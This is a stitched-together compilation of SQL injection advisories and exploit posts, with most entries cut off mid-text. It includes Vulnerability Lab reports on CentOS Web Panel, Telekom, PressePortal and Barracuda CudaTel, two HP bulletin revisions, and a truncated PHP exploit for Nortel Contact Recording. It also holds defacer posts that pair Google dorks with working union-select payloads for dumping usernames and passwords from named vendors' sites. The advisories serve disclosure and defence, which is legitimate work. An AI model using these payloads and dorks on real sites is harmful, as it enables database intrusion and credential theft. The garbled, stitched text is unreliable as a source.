CentOS Web Panel v0.9.8.12 - Remote SQL Injection Vulnerabilities
Document Title: === CentOS Web Panel v0.9.8.12 - Remote SQL Injection Vulnerabilities References (Source): http://www.vulnerability-lab.com/get_content.php?id=1833 Release Date: = 2018-01-22 Vulnerability Laboratory ID (VL-ID): 1833 Common Vulnerability Scoring System: 7.5 Vulnerability Class: SQL Injection Current Estimated Price: 4.000€ - 5.000€ Product & Service Introduction: === CentOS Web Panel - Free Web Hosting control panel is designed for quick and easy management of (Dedicated & VPS) servers without of need to use ssh console for every little thing. There is lot's of options and features for server management in this control panel. CWP automatically installs full LAMP on your server (apache,php, phpmyadmin, webmail, mailserver…). (Copy of the Homepage: http://centos-webpanel.com/features ) Abstract Advisory Information: == The vulnerability laboratory core research team discovered a remote sql-injection web vulnerability in the CentOS Web Panel v0.9.8.12. Vulnerability Disclosure Timeline: == 2018-01-22: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): CWP Product: CentOS Web Panel - (CWP) 0.9.8.12 Exploitation Technique: === Remote Severity Level: === High Technical Details & Description: ======== A remote sql-injection web vulnerability has been discovered in the official CentOS Web Panel v0.9.8.12 web-application. The vulnerability allows remote attackers to inject own malicious sql commands to compromise the connected web-server or dbms. The sql-injection vulnerability is located in the `row_id` and `domain` value of the `Add a domain` module POST method request. Remote attackers are able to manipulate the POST method request to execute own malicious sql commands on the application-side of the web-application. The request method to inject is POST and the attack vector is application-side. The vulnerability can be exploited by restricted user accounts against the web-application administrator. The security risk of the sql-injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.5. Exploitation of the remote sql injection vulnerability requires no user interaction and only a low privileged web-application user account. Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise. Request Method(s): [+] POST Vulnerable Module(s): [+] Add a domain Vulnerable Parameter(s): [+] row_id [+] domain Affected Module(s): [+] Delete domain Proof of Concept (PoC): === The remote sql-injecton vulnerability can be exploited by remote attackers with low privilege user account and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Add a domain 2. Delete the same domain 3. Intercept the http request with a session tamper 4. Manipulate in the POST method request the values `row_id` or `domain` with ' 5. Continue the request and an exploitable sql-exception becomes visible 6. Now the attacker can inject to the row_id and domain to execute malicious sql commands via restricted user account 7. Successful reproduce of the sql-injection vulnerability! --- SQL Error Exceptions --- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'test-domain'' at line 1 Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /usr/local/cwpsrv/htdocs/resources/admin/include/functions.php(1) : eval()'d code(1) : eval()'d code on line 5 --- PoC Session logs [POST] --- Status: 200[OK] POST http://cwp.localhost:2030/index.php?module=list_domains Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] Request Header: Host[185.4.149.65:2030] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://cwp.localhost:2030/index.php?module=list_domains] Cookie[cwpsrv-b66ec0f9742b8f4bd3407e0151cd756c=ae0c56ru1ver0k3d0cd1hh4147] Connection[keep-alive] POST-Daten: ifpost[yes] username[test-dom] domain[SQL-INJECTION PAYLOAD!] row_id[SQL-INJECTION PAYLOAD!] Response Header: Date
German Telekom Bug Bounty #11 - Remote SQL Injection Vulnerability
Document Title: === German Telekom Bug Bounty #11 - SQL Injection Vulnerability References (Source): http://www.vulnerability-lab.com/get_content.php?id=1177 Dev Article: http://www.vulnerability-db.com/dev/index.php/2014/02/06/german-telekom-bug-bounty-3x-remote-vulnerabilities/ Exclusive News: http://news.softpedia.com/news/Expert-Finds-SQL-Injection-and-RCE-Vulnerabilities-in-Deutsche-Telekom-Systems-424518.shtml Release Date: = 2014-02-06 Vulnerability Laboratory ID (VL-ID): 1177 Common Vulnerability Scoring System: 8.3 Product Service Introduction: === Deutsche Telekom AG (English: German Telecom) is a German telecommunications company headquartered in Bonn, North Rhine-Westphalia, Germany. Deutsche Telekom was formed in 1996 as the former state-owned monopoly Deutsche Bundespost was privatized. As of June 2008, the German government still holds a 15% stake in company stock directly, and another 17% through the government bank KfW. (Copy of the Homepage: http://en.wikipedia.org/wiki/Deutsche_Telekom http://www.telekom.com/bug-bounty ) Abstract Advisory Information: == The Vulnerability Laboratory Research Team discovered a remote SQL Injection web vulnerability in the official Telekom website web-application. Vulnerability Disclosure Timeline: == 2013-12-30: Researcher Notification Coordination (Ibrahim Mosaad El-Sayed) 2013-12-30: Vendor Notification (Telekom CERT Security Team) 2014-01-02: Vendor Response/Feedback (Telekom CERT Security Team) 2014-01-24: Vendor Fix/Patch (Telekom Developer Team - Reward 1000€) 2014-02-06: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Exploitation Technique: === Remote Severity Level: === Critical Technical Details Description: A remote SQL Injection web vulnerability has been discovered in the official Telekom (English) Fitness Check website web application. The vulnerability allows remote attackers to inject unauthorized own sql statements to compromise the affected web-application or dbms. The sql injection vulnerability is located in `englishtest2004/test.asp` file of the englishtest2004 module (path). After executing the query through the test.asp page, the query`s result can be seen from a `500 error` returned by the `test.asp` page. The connected vulnerable parameter in the `test.aspx` file is `mailbody` that is passed through the POST method request. The SQL injection bug is in the INSERT statement. Other paramaters like VORNAME, Email, PLZ, TELEFON can be accessed by usage of a malicious insert statement. The security risk of the sql injection vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 8.3(+). Exploitation of the remote sql injection web vulnerability requires NO user interaction or a privileged web-application user account. Successful exploitation of the remote pre-auth sql injection results in dbms, web-server and web-application (context) compromise. Vulnerable Module(s): [+] /englishtest2004/ Vulnerable File(s): [+] /englishtest2004/test.asp Vulnerable Parameter(s): [+] mailbody Proof of Concept (PoC): === The SQL injection vulnerability can be exploited by remote attackers without privileged application user account and without required user inter action. For demonstration or reproduce ... a) The attacker should visit the main page to take the test https://gt.telekom.de/englishtest2004eng/html/intro.htm b) The attacker should keep clicking on next until he reaches the final step in the test which is the page of Registration for the Fitness Check c) In the form of registering the test, we have many fields. We fill the up the vulnerable fields and then click on Register button d) The attacker then should intercept the request and edit the mailbody paremter to an apsrophe that will generate the SQL error e) After forwarding the request, we will find the SQL error in the INSERT statement echoed back in the page The post request that has been used to reproduce the image is: POST /englishtest2004/test.asp HTTP/1.1 Host: gt.telekom.de User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: https://gt.telekom.de/englishtest2004/html/intro_11.htm Cookie: _ga=GA1.2.1524944686.1388633141; ASPSESSIONIDQAQRBTRB=PJJNFNFCCPEDGGLMFOGEGNGK Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content
NewsAktuell PressePortal DE - Remote SQL Injection Web Vulnerability
Document Title: === NewsAktuell PressePortal DE - Remote SQL Injection Web Vulnerability References (Source): http://vulnerability-lab.com/get_content.php?id=1150 Lab News Article: http://www.vulnerability-lab.com/news/get_news.php?id=115 Release Date: = 2013-11-28 Vulnerability Laboratory ID (VL-ID): 1150 Common Vulnerability Scoring System: 8.7 Abstract Advisory Information: == The Vulnerability Laboratory Research Team discovered a critical SQL Injection web vulnerability in the official News-Aktuell - PressePortal website web-application. Vulnerability Disclosure Timeline: == 2013-04-26: Researcher Notification Coordination (Marco Onorati) 2013-05-01: Vendor Notification (PressePortal Team) 2013-11-28: Vendor Response/Feedback(PressePortal Team) 2013-11-28: Vendor Fix/Patch (PressePortal Developer Team) 2013-11-29: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Exploitation Technique: === Remote Severity Level: === Critical Technical Details Description: A remote sql injection web vulnerability has been discovered in the official News-Aktuell - PressePortal website web-application. The vulnerability allows remote attacker to execute own sql commands by usage of a vulnerable application value GET method request. The vulnerability is located in the `../services/content` module with the vulnerable iframe.htx file. Remote attackers are able to inject own sql commands by usage of the vulnerable `id` parameter. After the inject the website returns with a a obviously blank page but when you watch the source the execute is in the listed rss and context values. The issue is a classic remote sql injection. The security risk of the remote sql injection web vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 8.7(+). Exploitation of the sql injection web vulnerability requires no privileged web application user account and also no user interaction. Successful exploitation of the vulnerability results in web application (website), account system dbms compromise. Vulnerable Module(s): [+] services/content Vulnerable File(s): [+] iframe.htx Vulnerable Parameter(s): [+] id Affected Domain(s): [+] http://www.presseportal.de Proof of Concept (PoC): === The remote sql injection web vulnerability can be exploited by remote attackers without user interaction and also without privileged web application user account. For security demonstration or to reproduce the vulnerability follow the provided information and steps below. PoC: Remote SQL Injection http://www.presseportal.de/services/content/iframe.htx?id=b17ea41fbd7d93bcdda63799dd904314%27%20%20and%201=2%20%20union%20select%201,2,3,4,5,6,7,8,@@version,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43, 44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60%20+--+%20inc=true -- PoC Session Logs [GET] --- Status: 200[OK] GET http://www.presseportal.de/services/content/iframe.htx ?id=b17ea41fbd7d93bcdda63799dd904314%27%20%20and%201=2%20%20union%20select%201,2,3,4,5,6,7,8,@@version,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60%20+--+%20inc=true Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[3145] Mime Type[text/html] Request Headers: Host[www.presseportal.de] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Cookie[PHPSESSID=emou1lkl2c3vin16agjg90eig1; PressePortalDeDst=portal6-pp.de; __utma=239002817.282394538.1385649109.1385649109.1385649109.1; __utmb=239002817.4.10.1385649109; __utmc=239002817; __utmz=239002817.1385649109.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __atuvc=2%7C48; POPUPCHECK=1385735515782] Connection[keep-alive] Cache-Control[max-age=0] Response Headers: Date[Thu, 28 Nov 2013 14:52:27 GMT] Server[Apache] X-Powered-By[PHP/5.3.27] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0] Pragma[no-cache] Content-Type[text/html] Content-Length[3145] Connection[Keep-alive] Via[1.1 AN-0003011040777600] Refernce(s): http://www.presseportal.de/services/content/iframe.htx?id https://www.presseportal.de/services/content/iframe.htx?id Picture(s
Barracuda CudaTel 2.6.02.040 - Remote SQL Injection Vulnerability
Title: == Barracuda CudaTel 2.6.02.040 - Remote SQL Injection Vulnerability Date: = 2013-07-20 References: === http://vulnerability-lab.com/get_content.php?id=775 BARRACUDA NETWORK SECURITY ID: BNSEC-723 VL-ID: = 775 Common Vulnerability Scoring System: 8.6 Introduction: = Designed to enable seamless voice and video communication, the CudaTel Communication Server is an easy-to-use, affordable, next-generation phone system for businesses. CudaTel Communication Server s enterprise-class feature set includes Voice over IP (VoIP) PBX services, conferencing, follow-me, automated attendant services, and more, controlled by an easy-to-use Web interface. CudaTel Communication Server is compatible with any SIP device and provider, and can be pre-configured for use with both analog and digital telephone networks. Powerful, Complete Solution With an expansive feature set and and no per user or phone licensing fees, the CudaTel Communication Server is equipped and priced for organizations of any size. Native High Definition audio support and integrated phone line (TDM) hardware produces an unparalleled audio experience. VOIP encryption protects calls from hackers and digital eavesdroppers. (Copy of the Vendor Homepage: http://www.barracudanetworks.ca/cudatel.aspx ) Abstract: = 1.1 The Vulnerability Laboratory Research Team discovered a sql injection vulnerability in Barracuda Networks CudaTel v2.6.002.040 appliance application. 1.2 The Vulnerability Laboratory Research Team discovered a client side vulnerability in Barracuda Networks CudaTel v2.6.002.040 appliance application. Report-Timeline: 2012-11-26: Researcher Notification Coordination (Benjamin Kunz Mejri) 2012-11-27: Vendor Notification (Barracuda Networks Security Team - Bug Bounty Program) 2012-12-01: Vendor Response/Feedback (Barracuda Networks Security Team - Bug Bounty Program) 2013-03-01: Vendor Fix/Patch (Barracuda Networks Developer Team) [Manager: Dave Farrow] 2013-07-20: Public Disclosure (Vulnerability Laboratory) Status: Published Affected Products: == Barracuda Networks Product: CudaTel - Communication Server 2.6.002.040 Exploitation-Technique: === Remote Severity: = Critical Details: 1.1 A SQL Injection vulnerability is detected in the Barracuda Networks CudaTel v2.6.002.040 appliance web application. The vulnerability allows remote attackers or local low privilege application user accounts to inject (execute) own SQL commands to the affected application dbms. The blind sql injection vulnerability is located in the cdr module when processing to request manipulated row page parameters as searchstring. A remote attacker can for example delete the standard value context of the module request to inject (execute) own sql commands. Eploitation of the vulnerability requires a low privilege web application user account and no user interaction. Successful exploitation of the vulnerability results in datbase management system and web application compromise. Vulnerable Section(s) [+] search - listing Vulnerable Module(s) [+] cdr - seachstring listing Vulnerable Parameter(s) [+] row [+] page 1.2 A client side input validation vulnerability is detected in the Barracuda Networks CudaTel v2.6.002.040 appliance web application. The non-persistent vulnerability allows remote attackers to manipulate client side application requests to browser. The secound vulnerability (client side) is located in the invalid value exception handling. Remote attackers can provoke the exception-handling by including invalid script code inputs to redisplay the malicious context when processing to load the output. To provoke the exception-handling the remote attacker can use the vulnerable row parameter of the cdr searchstring listing to execute own malicious (client-side) script code. Exploitation of the vulnerability requires a no web application user account but medium or high user interaction. Successful exploitation of the vulnerability results in client side phishing, client side session hijacking and client side external redirects to malware or malicious websites. Exploitation requires medium user interaction. Vulnerable Section(s): [+] search - listing Vulnerable Module(s): [+] cdr - seachstring listing Vulnerable Parameter(s): [+] row Affected Module(s): [+] Exception-Handling (invalid value) Proof of Concept: = 1.1 The sql injection vulnerability can be exploited by remote attackers with low privilege web application user account and without user
[security bulletin] HPSBMU02775 SSRT100853 rev.2 - HP Performance Insight for Networks Running on HP-UX, Linux, Solaris, and Windows, Remote SQL Injection, Cross Site Scripting (XSS), Privilege Elevat
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03312417 Version: 2 HPSBMU02775 SSRT100853 rev.2 - HP Performance Insight for Networks Running on HP-UX, Linux, Solaris, and Windows, Remote SQL Injection, Cross Site Scripting (XSS), Privilege Elevation NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2012-05-07 Last Updated: 2012-05-09 Potential Security Impact: Remote SQL injection, cross site scripting (XSS), privilege elevation Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP Performance Insight for Networks running on HP-UX, Linux, Solaris, and Windows. The vulnerabilities could be exploited remotely resulting in SQL injection, cross site scripting (XSS), and privilege elevation. References: CVE-2012-2007 (SQL injection), CVE-2012-2008 (XSS), CVE-2012-2009 (privilege elevation) SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Performance Insight for Networks Running on HP-UX, Linux, Solaris, and Windows v5.3.x , v5.41, v5.41.001, v5.41.002 BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2012-2007(AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2012-2008(AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2012-2009(AV:N/AC:M/Au:S/C:C/I:P/A:N) 7.0 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has made a hotfix available to resolve the vulnerabilities. The hotfix requires HP Performance Insight for Networks v5.41.002 (Patch 2). The hotfix is available from the normal HP Services support channel. Customers should open a support case to request 5.41.002 piweb HF09. MANUAL ACTIONS: Yes - NonUpdate Apply the 5.41.002 piweb HF09 hotfix if HP Performance Insight for Networks is installed. PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa The following text is for use by the HP-UX Software Assistant. AFFECTED VERSIONS HP-UX B.11.31 HP-UX B.11.23 HP-UX B.11.11 = action: apply 5.41.002 piweb HF09 or subsequent END AFFECTED VERSIONS HISTORY Version:1 (rev.1) - 7 May 2012 Initial release Version:2 (rev.2) - 9 May 2012 Corrected CVE numbers in Background section (2011-2012) Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430 Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided as is without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard
[security bulletin] HPSBMU02775 SSRT100853 rev.1 - HP Performance Insight for Networks Running on HP-UX, Linux, Solaris, and Windows, Remote SQL Injection, Cross Site Scripting (XSS), Privilege Elevat
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03312417 Version: 1 HPSBMU02775 SSRT100853 rev.1 - HP Performance Insight for Networks Running on HP-UX, Linux, Solaris, and Windows, Remote SQL Injection, Cross Site Scripting (XSS), Privilege Elevation NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2012-05-07 Last Updated: 2012-05-07 Potential Security Impact: Remote SQL injection, cross site scripting (XSS), privilege elevation Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP Performance Insight for Networks running on HP-UX, Linux, Solaris, and Windows. The vulnerabilities could be exploited remotely resulting in SQL injection, cross site scripting (XSS), and privilege elevation. References: CVE-2012-2007 (SQL injection), CVE-2012-2008 (XSS), CVE-2012-2009 (privilege elevation) SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Performance Insight for Networks Running on HP-UX, Linux, Solaris, and Windows v5.3.x , v5.41, v5.41.001, v5.41.002 BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2011-2007(AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2011-2008(AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2011-2009(AV:N/AC:M/Au:S/C:C/I:P/A:N) 7.0 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has made a hotfix available to resolve the vulnerabilities. The hotfix requires HP Performance Insight for Networks v5.41.002 (Patch 2). The hotfix is available by contact the normal HP Services channel and requesting 5.41.002 piweb HF09. MANUAL ACTIONS: Yes - NonUpdate Apply the 5.41.002 piweb HF09 hotfix if HP Performance Insight for Networks is installed. PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa The following text is for use by the HP-UX Software Assistant. AFFECTED VERSIONS HP-UX B.11.31 HP-UX B.11.23 HP-UX B.11.11 = action: apply apply 5.41.002 piweb HF09 or subsequent END AFFECTED VERSIONS HISTORY Version:1 (rev.1) - 7 May 2012 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430 Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided as is without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company
Nortel Contact Recording Centralized Archive 6.5.1 EyrAPIConfiguration getSubKeys() Remote SQL Injection Exploit
?php
/*
Nortel Contact Recording Centralized Archive 6.5.1 EyrAPIConfiguration
Web Service getSubKeys() Remote SQL Injection Exploit
tested against:
Microsoft Windows Server 2003 r2 sp2
Microsoft SQL Server 2005 Express
download uri:
ftp://ftp.avaya.com/incoming/Up1cku9/tsoweb/web1/software/c/contactcenter/crqm/6_5_CS1K_2/Nortel-DVD3-Archive-6_5.iso
background:
This software installs a Tomcat http server which listens on
port 8080 for incoming connections. It exposes the
following servlet as declared inside
c:\Program Files\[choosen folder]\Tomcat5\webapps\EyrAPI\WEB-INF\web.xml :
..
servlet-mapping
servlet-nameEyrAPIConfiguration/servlet-name
url-pattern/EyrAPIConfiguration/*/url-pattern
/servlet-mapping
..
at the following url:
http://[host]:8080/EyrAPI/EyrAPIConfiguration/EyrAPIConfigurationIf
Vulnerability:
without prior authentication, you can reach a web service
with various methods availiable, as described inside
the associated wsdl, see file:
c:\Program Files\[choosen
folder]\Tomcat5\webapps\EyrAPI\WEB-INF\classes\EyrAPIConfiguration.wsdl
among them, the getSubKeys() method.
Now look at getSubKeys() inside the decompiled
c:\Program Files\[choosen
folder]\Tomcat5\webapps\EyrAPI\WEB-INF\classes\com\eyretel\eyrapi\EyrAPIConfigurationImpl.class
:
..
public String getSubKeys(boolean iterateSubKeys, boolean includeValues, String
systemId, String componentId, String sysCompId, String userName)
throws RemoteException
{
StringBuffer xml;
ConfigOwnerId configOwnerId;
Connection conn;
PreparedStatement pStmt;
ResultSet rs;
PreparedStatement pStmt2;
ResultSet rs2;
log.info((new StringBuilder()).append(Request getSubKeys:
iterateSubKeys=).append(iterateSubKeys).append(,
includeValues=).append(includeValues).append(,
SystemId=).append(systemId).append(,
componentId=).append(componentId).append(,
sysCompId=).append(sysCompId).append(,
userName=).append(userName).toString());
xml = new StringBuffer(ConfigurationNodeList);
configOwnerId = null;
conn = null;
pStmt = null;
rs = null;
pStmt2 = null;
rs2 = null;
try
{
conn = SiteDatabase.getInstance().getConnection();
if(EyrAPIProperties.getInstance().getProperty(database,
MSSQLServer).equalsIgnoreCase(Oracle))
{
if(componentId.compareToIgnoreCase() == 0)
componentId = *;
if(systemId.compareToIgnoreCase() == 0)
systemId = *;
if(sysCompId.compareToIgnoreCase() == 0)
sysCompId = *;
if(userName.compareToIgnoreCase() == 0)
userName = *;
pStmt = conn.prepareStatement((new
StringBuilder()).append(SELECT ConfigOwnerID FROM ConfigOwnerView WHERE
nvl(ComponentID, '*') = ').append(componentId).append(' AND
).append(nvl(SystemID, '*') = ').append(systemId).append(' AND
).append(nvl(SysCompID, '*') = ').append(sysCompId).append(' AND
).append(nvl(UserName, '*') = ').append(userName).append(').toString());
rs = pStmt.executeQuery();
} else
{
pStmt = conn.prepareStatement((new
StringBuilder()).append(SELECT ConfigOwnerID FROM ConfigOwnerView WHERE
ISNULL(CONVERT(varchar(36), ComponentID), '') =
').append(unpunctuate(componentId)).append(' AND
).append(ISNULL(CONVERT(varchar(36), SystemID), '') =
').append(unpunctuate(systemId)).append(' AND
).append(ISNULL(CONVERT(varchar(36), SysCompID), '') =
').append(unpunctuate(sysCompId)).append(' AND ).append(ISNULL(UserName,
'') = ').append(unpunctuate(userName)).append(').toString());
rs = pStmt.executeQuery();
}
if(rs.next())
{
String strConfigOwnerId = rs.getString(1);
if(!rs.wasNull())
configOwnerId = new ConfigOwnerId(strConfigOwnerId);
pStmt2 = conn.prepareStatement((new
StringBuilder()).append(SELECT ConfigGroupID, ConfigGroupName FROM
ConfigGroupView WHERE ConfigOwnerID =
').append(configOwnerId.toString()).append(').toString());
for(rs2 = pStmt2.executeQuery(); rs2.next();
xml.append(getSubKeyValuesInc(new Integer(rs2.getInt(1)), iterateSubKeys,
includeValues)));
}
}
catch(SQLException e)
{
String msg = Unable to get subkeys;
log.error(msg, e);
throw new RemoteException(msg, e);
}
catch(GenericDatabaseException e)
{
String msg = Unable to get subkeys;
log.error(msg, e);
throw new RemoteException(msg, e);
}
DbHelper.closeStatement(log, pStmt);
DbHelper.closeResultSet(log, rs);
DbHelper.closeStatement(log, pStmt2);
DbHelper.closeResultSet(log, rs2
Loop (ricetta.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Loop (ricetta.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.loopmm.com/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Loop - creazioni multimediali inurl:ricetta.php?id= Exploite: www.victim.com/ricetta.php?id=[SQL] # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Manifattura Web (prodotto.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Manifattura Web (prodotto.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.manifatturaweb.it/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Manifattura Web inurl:prodotto.php?id= Exploite: www.victim.com/prodotto.php?id=[SQL] # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
Editel (news-dettaglio.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## Editel (news-dettaglio.php?id) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.editeltn.it/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Realizzazione sito: Editel inurl:news-dettaglio.php?id= Exploite: www.victim.com/news-dettaglio.php?id=+28+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users OR: www.victim.com/news-dettaglio.php?id=+9+union+select+1,2,concat(user,0x3a,password),4,5,6,7,8,9+from+utenti-- # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
BvCom (dettaglio.php?idnews) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD ## ## ## Remote SQL injection Vulnerability ## ## BvCom (dettaglio.php?idnews) ## ### ### ### ### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : ehsan_hp...@hotmail.com ## ## Vendor : http://www.bvcom.it/ ## ## Persian Gulf 4 Ever! # # # # # ## ## Dork : Powered by: bvcom.it inurl:dettaglio.php?idnews= Exploite: www.victim.com/news/dettaglio.php?idnews=-9+union+select+1,2,user(),4,version(),6,7,8-- # SpeCial TanX To : Skote_Vahshat ## ### IRANIAN THE BEST HACKERS IN THE WORLD ##
WSTAFF Remote SQL injection Vulnerability
